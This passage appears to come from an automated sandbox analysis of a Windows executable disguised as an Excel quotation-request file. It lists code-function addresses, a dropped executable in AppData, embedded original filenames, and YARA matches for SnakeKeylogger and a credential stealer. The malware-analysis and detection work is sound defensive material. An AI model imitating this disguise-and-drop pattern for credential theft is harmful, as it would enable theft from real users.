Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B915F8	9_2_05B915F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B915E9	9_2_05B915E9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B965C0	9_2_05B965C0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B90D38	9_2_05B90D38
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9E578	9_2_05B9E578
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B97D68	9_2_05B97D68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B90D48	9_2_05B90D48
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B90498	9_2_05B90498
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B90488	9_2_05B90488
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9BC78	9_2_05B9BC78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9DC68	9_2_05B9DC68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B93460	9_2_05B93460
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9BC67	9_2_05B9BC67
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9FC58	9_2_05B9FC58
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9DC57	9_2_05B9DC57
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9FC48	9_2_05B9FC48
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9F7B9	9_2_05B9F7B9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B95780	9_2_05B95780
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92FF8	9_2_05B92FF8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9B7E8	9_2_05B9B7E8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9D7D8	9_2_05B9D7D8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9B7DA	9_2_05B9B7DA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9D7C9	9_2_05B9D7C9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9F7C8	9_2_05B9F7C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9771F	9_2_05B9771F
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B97711	9_2_05B97711
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92758	9_2_05B92758
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92757	9_2_05B92757
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92748	9_2_05B92748
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9CEB8	9_2_05B9CEB8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9AEB7	9_2_05B9AEB7
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B91EA8	9_2_05B91EA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9EEA8	9_2_05B9EEA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9CEA7	9_2_05B9CEA7
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B91E98	9_2_05B91E98
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9EE97	9_2_05B9EE97
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B94ED0	9_2_05B94ED0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9AEC8	9_2_05B9AEC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B94EC3	9_2_05B94EC3
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B94620	9_2_05B94620
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B94610	9_2_05B94610
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B96E70	9_2_05B96E70
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B96E60	9_2_05B96E60
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B941B8	9_2_05B941B8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B911A0	9_2_05B911A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B91190	9_2_05B91190
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B941C8	9_2_05B941C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9C108	9_2_05B9C108
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9E0F8	9_2_05B9E0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9C0F8	9_2_05B9C0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B908F0	9_2_05B908F0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9E0E8	9_2_05B9E0E8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B908E1	9_2_05B908E1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9A0E0	9_2_05B9A0E0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9A0D0	9_2_05B9A0D0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B96030	9_2_05B96030
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B96020	9_2_05B96020
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B93008	9_2_05B93008
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B93007	9_2_05B93007
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B90006	9_2_05B90006
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B90040	9_2_05B90040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92BB0	9_2_05B92BB0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92BA1	9_2_05B92BA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B95BD8	9_2_05B95BD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B95BC9	9_2_05B95BC9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9F338	9_2_05B9F338
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9D337	9_2_05B9D337
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B95328	9_2_05B95328
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9F328	9_2_05B9F328
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B95318	9_2_05B95318
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B92300	9_2_05B92300
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9B358	9_2_05B9B358
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B98B49	9_2_05B98B49
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9D348	9_2_05B9D348
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9B348	9_2_05B9B348
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B972B8	9_2_05B972B8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B922F0	9_2_05B922F0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B972C8	9_2_05B972C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9CA28	9_2_05B9CA28
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B96A18	9_2_05B96A18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9EA18	9_2_05B9EA18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B96A1A	9_2_05B96A1A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9CA17	9_2_05B9CA17
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B9EA07	9_2_05B9EA07
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B94A78	9_2_05B94A78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B94A68	9_2_05B94A68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B91A50	9_2_05B91A50
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_05B91A40	9_2_05B91A40
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_02B9DE4C	10_2_02B9DE4C
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_052A1090	10_2_052A1090
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_052A7368	10_2_052A7368
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_052A0006	10_2_052A0006
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_052A0040	10_2_052A0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_052A7358	10_2_052A7358
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 10_2_07594140	10_2_07594140
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F71A9	14_2_014F71A9
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F5371	14_2_014F5371
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FD271	14_2_014FD271
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FD540	14_2_014FD540
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FC460	14_2_014FC460
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FA488	14_2_014FA488
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FC730	14_2_014FC730
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F7920	14_2_014F7920
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FCA00	14_2_014FCA00
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FEC08	14_2_014FEC08
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FCCD0	14_2_014FCCD0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FBFC8	14_2_014FBFC8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FCFA1	14_2_014FCFA1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FF4C0	14_2_014FF4C0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FF4AF	14_2_014FF4AF
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F29EC	14_2_014F29EC
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014FEBFA	14_2_014FEBFA
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F3B95	14_2_014F3B95
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F3AA1	14_2_014F3AA1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_014F3E09	14_2_014F3E09
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF1E80	14_2_06BF1E80
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF47A8	14_2_06BF47A8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF1798	14_2_06BF1798
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF9398	14_2_06BF9398
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF10B8	14_2_06BF10B8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF8CC8	14_2_06BF8CC8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF0040	14_2_06BF0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF8AA8	14_2_06BF8AA8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFE288	14_2_06BFE288
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFE6E0	14_2_06BFE6E0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFE6D1	14_2_06BFE6D1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFDE30	14_2_06BFDE30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFDE20	14_2_06BFDE20
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFE278	14_2_06BFE278
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF1E72	14_2_06BF1E72
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF4798	14_2_06BF4798
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFEF90	14_2_06BFEF90
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF1788	14_2_06BF1788
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFEF82	14_2_06BFEF82
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFF3E8	14_2_06BFF3E8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFEB38	14_2_06BFEB38
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFEB28	14_2_06BFEB28
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF8320	14_2_06BF8320
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF8310	14_2_06BF8310
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF10A7	14_2_06BF10A7
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFFC98	14_2_06BFFC98
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFCCD0	14_2_06BFCCD0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFCCC0	14_2_06BFCCC0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFF830	14_2_06BFF830
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFC420	14_2_06BFC420
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFC40F	14_2_06BFC40F
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BF0007	14_2_06BF0007
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFC878	14_2_06BFC878
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFC869	14_2_06BFC869
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFF840	14_2_06BFF840
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFD580	14_2_06BFD580
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFD9D8	14_2_06BFD9D8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFD9CA	14_2_06BFD9CA
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFD128	14_2_06BFD128
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFD119	14_2_06BFD119
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Code function: 14_2_06BFD57F	14_2_06BFD57F

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2101982159.0000000006F00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.0000000003C56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092066185.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2089156447.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512742748.0000000001177000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000439000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Binary or memory string: OriginalFilenamesZXF.exeD vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
